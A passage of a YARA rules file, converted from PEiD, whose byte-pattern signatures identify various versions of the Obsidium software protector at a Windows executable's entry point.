Obsidium_V1357_Obsidium_Softwarenbsp_nbsp_SignByfly_20080521: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 ?? ?? ?? ?? EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 03 ?? ?? ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 01 ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1357_Obsidium_Software_20080521: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 ?? ?? ?? ?? EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 03 ?? ?? ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 01 ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1331_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 02 ?? ?? E8 5F 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1331_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 02 ?? ?? E8 5F 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1250_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1339_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 CF 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_unknown_version: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 50 EB 03 ?? ?? ?? E8 ?? 00 00 00 EB 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1111: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 E7 1C 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1334_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 }\r\n        $b = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1363_Obsidium_Softwarenbsp_nbsp_SignByfly_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? E8 ?? 00 00 00 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 26 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 33 C0 EB 02 ?? ?? 64 FF 30 EB 01 ?? 64 89 20 EB 01 ?? EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 ?? 00 00 00 EB 03 ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1311_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 03 ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1350_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 02 ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 20 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 50 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1300_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1304_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 ?? 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1300_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B 50 EB 03 8A 0B 93 33 C0 EB 02 28 B9 8B 00 EB 01 04 C3 EB 04 65 B3 54 0A E9 FA 00 00 00 EB 01 A2 E8 D5 FF FF FF EB 02 2B 49 EB 03 7C 3E 76 58 EB 04 B8 94 92 56 EB 01 72 64 67 8F 06 00 00 EB 02 23 72 83 C4 04 EB 02 A9 CB E8 47 26 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1363_Obsidium_Software_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? E8 ?? 00 00 00 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 26 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 33 C0 EB 02 ?? ?? 64 FF 30 EB 01 ?? 64 89 20 EB 01 ?? EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 ?? 00 00 00 EB 03 ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13021_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 2B 26 00 00 }\r\n        $b = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1342_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 C3 27 00 00 }\r\n        $b = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1361_Obsidium_Softwarenbsp_nbsp_SignByfly_20080521: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 ?? EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 64 FF 30 EB 04 ?? ?? ?? ?? 64 89 20 EB 01 ?? EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 01 ?? E8 ?? FF FF FF EB 01 ?? EB 03 ?? ?? ?? EB 01 ?? EB 03 ?? ?? ?? 64 8F 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? 58 EB 02 ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V12X_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 33 C0 8B 54 24 0C 83 82 B8 00 00 00 0D C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1300_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 29 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V130X_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B ?? ?? ?? EB 04 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1304_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 }\r\n        $b = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? E8 3B 26 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v13037_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1334_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B ?? 24 0C EB 01 ?? 83 ?? B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1300_Obsidium_Software_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 CD 20 EB EB 01 EB 1E EB 01 EB EB 02 CD 20 9C EB 03 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1355_Obsidium_Softwarenbsp_nbsp_SignByfly_20080411: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2B 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 ?? ?? ?? ?? EB 01 ?? E8 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 01 ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1111_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 ?? 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1250_Obsidium_Software_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1333_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1338_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 57 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1360_Obsidium_Software_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? 50 EB 01 ?? E8 ?? 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 1F EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 33 C0 EB 01 ?? 64 FF 30 EB 04 ?? ?? ?? ?? 64 89 20 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 ?? 00 00 00 EB 01 ?? E8 ?? FF FF FF EB 01 ?? EB 03 ?? ?? ?? EB 02 ?? ?? EB 02 ?? ?? 64 8F 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1322_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1354_Obsidium_Software_200800207: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2D 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 5B 28 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1336_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1258_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 7B 21 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1336_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 }\r\n        $b = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule 